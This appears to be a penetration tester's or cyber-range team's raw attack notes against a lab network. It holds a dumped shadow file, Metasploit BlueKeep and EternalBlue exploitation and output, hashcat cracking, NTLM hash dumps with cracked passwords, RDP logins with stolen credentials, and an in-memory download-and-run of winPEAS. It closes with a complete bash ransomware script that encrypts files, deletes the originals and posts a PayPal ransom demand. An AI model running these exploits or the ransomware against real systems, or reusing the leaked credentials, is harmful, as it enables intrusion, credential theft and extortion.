root:$6$V91B2eA4NLQDXkK.$8HMq13zriCVZq2Wdz4hQmq.wSJg6oDCa3ExX9LQKTTHT7s9gk6u45bCc2IzRzymrmxF8zegOh/YrAA8jyTCsz0:18779:0:99999:7:::
daemon:*:18779:0:99999:7:::
bin:*:18779:0:99999:7:::
sys:*:18779:0:99999:7:::
sync:*:18779:0:99999:7:::
games:*:18779:0:99999:7:::
man:*:18779:0:99999:7:::
lp:*:18779:0:99999:7:::
mail:*:18779:0:99999:7:::
news:*:18779:0:99999:7:::
uucp:*:18779:0:99999:7:::
proxy:*:18779:0:99999:7:::
www-data:*:18779:0:99999:7:::
backup:*:18779:0:99999:7:::
list:*:18779:0:99999:7:::
irc:*:18779:0:99999:7:::
gnats:*:18779:0:99999:7:::
nobody:*:18779:0:99999:7:::
_apt:*:18779:0:99999:7:::
systemd-timesync:*:18779:0:99999:7:::
systemd-network:*:18779:0:99999:7:::
systemd-resolve:*:18779:0:99999:7:::
messagebus:*:18779:0:99999:7:::
sshd:*:18779:0:99999:7:::
cadm:$6$FXKabw570kGSXnL6$FfQUkrSUB7HtFXWuAwJlSV/YrFB0Vel8nJ.sZ9dOV.P/0icxeY5N/mNjW8HK/WBY20KYhq84jkIw44yaym3jt1:18779:0:99999:7:::
systemd-coredump:!!:18779::::::
mysql:!:18779:0:99999:7:::
admin:$6$g.7PD1hmRs69HVHL$h/.STarcTEGBMGL4grwdgMm2gMBLj12xWRgm/Vu1p5uJObiImx3aYPyyAGK5O7nYQ.GEKr/xskRhEf5ZkXd4t1:19060:0:99999:7:::
```
```
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts = 10.11.4.8/239.5/10.11.240.14
set target 1
exploit
```
Password for admin:
``` bash
hashcat -m 1800 -a 0 hashes.hash rockyou7.txt
> $6$g.7PD1hmRs69HVHL$h/.STarcTEGBMGL4grwdgMm2gMBLj12xWRgm/Vu1p5uJObiImx3aYPyyAGK5O7nYQ.GEKr/xskRhEf5ZkXd4t1:Destiny1
```
```bash
ssh admin@10.11.2.11
admin@10.11.2.11's password:
Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key.
```
```bash
root@elto-portal2:~# cat .nano_history
DumpIOInput
554
New user added to the system
syslog
Include
edit-pass
edit-sub
myFu
home?des
User
Redir
exa
goo
google.com
ASD
ya.
RewriteBase /
Rewrite
Base
RewriteEngine
examp
ya.ru
.git
index.php
Creat
Create Content
Unknown problem somewhere in the
Non standard syslog message (siz
$InputFilePollInterval
Polling
$SystemLogRateLimitBurst
evil
```
`find / -newermt "2022-03-5" -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" -not -path "/run/*"`
Attacker - 10.11.200.50
# Interesting files:
/var/backups/shadow.bak - ne pravda
/root/.*_history
/home/*/.*_history
# Trash
create database drupal;
grant all privileges on drupal.* to drupaluser@localhost identified by 'DruP@ss531';
flush privileges;
drop database drupal;
create database drupal;
grant all privileges on drupal.* to drupaluser@localhost identified by 'DruP@ss531';
flush privileges;
```
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data
| 1 | admin | $S$DrjhY9H/SDz7/hZ4sJp2KiQWx3/ldBEFaCJQK0DUyRRyeHR6W3zw | svc-cyber-mail@rt-solar.ru | | | NULL | 1595325583 | 1595579787 | 1595579787 | 1 | Europe/Moscow | | 0 | svc-cyber-mail@rt-solar.ru | a:1:{s:17:"mimemail_textonly";i:0;} |
| 4 | user1 | $S$DCWEfhlKrg8bKCI9TJSn7hVyjp05ktwnM6KlHC4wRE0scj1CBbaN | user1@server.example | | | panopoly_wysiwyg_text | 1595327058 | 1606263319 | 1606263319 | 1 | Europe/Moscow | | 0 | user1@server.example | a:2:{s:17:"mimemail_textonly";i:0;s:18:"htmlmail_plaintext";i:0;} |
```
# Eternalblue:
```
rhosts => 10.11.2.12
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.2.12:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.2.12:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
rhosts => 10.11.4.8
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.4.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.4.8:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
rhosts => 10.11.239.5
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.239.5:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.239.5:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.11.239.6
rhosts => 10.11.239.6
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.239.6:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.239.6:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
rhosts => 10.11.240.14
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.240.14:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.240.14:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```msf
use exploit/windows/smb/ms17_010_eternalblue
```
host | res | hashes
:-:|:-:|:-:
10.11.2.12|Server username: NT AUTHORITY\система
10.11.4.8|Server username: NT AUTHORITY\система|
10.11.239.5|Server username: NT AUTHORITY\система|
10.11.239.6|Server username: NT AUTHORITY\система|
10.11.240.14||
10.11.2.12:
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set session 2
session => 2
msf6 post(windows/gather/hashdump) > run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 791b05821400438629a2a79f2923fa52...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
cadm:";)"
[*] Dumping password hashes...
Администратор:500:aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee:::
Гость:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cadm:1000:aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55:::
[*] Post module execution completed
```
# MSF instruction
```bash
sudo msfdb_init
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhosts <ip>
run
```
https://www.hacking-tutorial.com/hacking-tutorial/5-steps-to-enable-remote-desktop-using-metasploit-meterpreter/#sthash.PkPFFSLt.dpbs
administrators_authorized_keys
```powershell
powershell
$url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
[Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content));
[winPEAS.Program]::Main("log=./winpeas.log")
```
Linux version 3.16.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.7-ckt9-2 (2015-04-13)
```
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
10.11.2.12 445/tcp (smb) Администратор Blank password
10.11.2.12 10.11.2.12 445/tcp (smb) Администратор aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.2.12 445/tcp (smb) Гость Blank password
10.11.2.12 10.11.2.12 445/tcp (smb) Гость aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.2.12 10.11.2.12 445/tcp (smb) cadm aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55 NTLM hash nt,lm
10.11.239.5 10.11.239.5 445/tcp (smb) Администратор aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee NTLM hash nt,lm
10.11.239.5 10.11.2.12 445/tcp (smb) Гость aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.239.5 10.11.2.12 445/tcp (smb) cadm aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55 NTLM hash nt,lm
10.11.239.5 10.11.239.5 445/tcp (smb) oper aad3b435b51404eeaad3b435b51404ee:b59607640885d9c51c5a85a5126c9551 NTLM hash nt,lm
10.11.239.6 10.11.239.5 445/tcp (smb) Администратор aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee NTLM hash nt,lm
10.11.239.6 10.11.2.12 445/tcp (smb) Гость aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.239.6 10.11.2.12 445/tcp (smb) cadm aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55 NTLM hash nt,lm
10.11.239.6 10.11.239.5 445/tcp (smb) oper aad3b435b51404eeaad3b435b51404ee:b59607640885d9c51c5a85a5126c9551 NTLM hash nt,lm
10.11.240.14 10.11.2.12 445/tcp (smb) Администратор aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.240.14 10.11.2.12 445/tcp (smb) Гость aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.240.14 10.11.2.12 445/tcp (smb) cadm aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55 NTLM hash nt,lm
```
# новое
```
Администратор:500:aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee:::Maggie1
oper:1001:aad3b435b51404eeaad3b435b51404ee:b59607640885d9c51c5a85a5126c9551:::Stephanie1
```
```
rdesktop -u Администратор -p Maggie1 10.11.239.5
```
c:/ransom.ps1
4.13 - borisov - enggeneral
10.11.4.10:/документы/11password.zip
https://dropmefiles.com/A2yjV
```bash
#!/bin/bash
iv=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 32`
pass=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 10`
dirwalk=/var/www/html
files=`find $dirwalk -maxdepth 1 -type f | grep -P ".php$|FLAG.txt$"`
for f in $files
do
outfile=$f.encr
openssl enc -aes-256-cbc -a -salt -in $f -out $outfile -pass pass:$pass -iv $iv
rm $f
done
echo "Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key." | wall
echo "Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key." > /etc/motd
exit 0
```
Sign in with Wallet
Connect another wallet